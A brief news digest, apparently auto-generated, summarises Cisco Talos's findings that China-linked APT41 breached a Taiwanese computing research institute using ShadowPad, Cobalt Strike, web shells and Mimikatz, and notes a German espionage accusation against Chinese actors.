August 2, 2024 at 12:42PM
A Taiwanese research institute specializing in computing was breached by China-affiliated threat actors, delivering backdoors and malware like ShadowPad and Cobalt Strike. Cisco Talos discovered the activity in August 2023 and attributed it to APT41. The attackers used various techniques to evade detection and exfiltrated documents from the network. This follows similar cyber attacks by Chinese state actors in other countries.
Based on the meeting notes, here are the key takeaways:
– A Taiwanese government-affiliated research institute specializing in computing and associated technologies was breached by nation-state threat actors with ties to China.
– Security researchers from Cisco Talos identified the attack in August 2023.
– The threat actors used a variety of backdoors and post-compromise tools, including ShadowPad and Cobalt Strike.
– The attackers were able to compromise three hosts in the targeted environment and exfiltrate some documents from the network.
– The attack involved the use of an outdated vulnerable version of Microsoft Office IME binary as a loader, abnormal PowerShell commands, web shells, and other techniques to maintain persistent access and drop additional payloads.
– The attackers also utilized Mimikatz to extract passwords and executed several commands to gather information on user accounts, directory structure, and network configurations.
– Germany recently accused Chinese state actors of a 2021 cyber attack on its national mapping agency for espionage purposes, to which China’s embassy in Berlin responded by calling the accusation unfounded.
For more exclusive content, you can follow the source on Twitter and LinkedIn.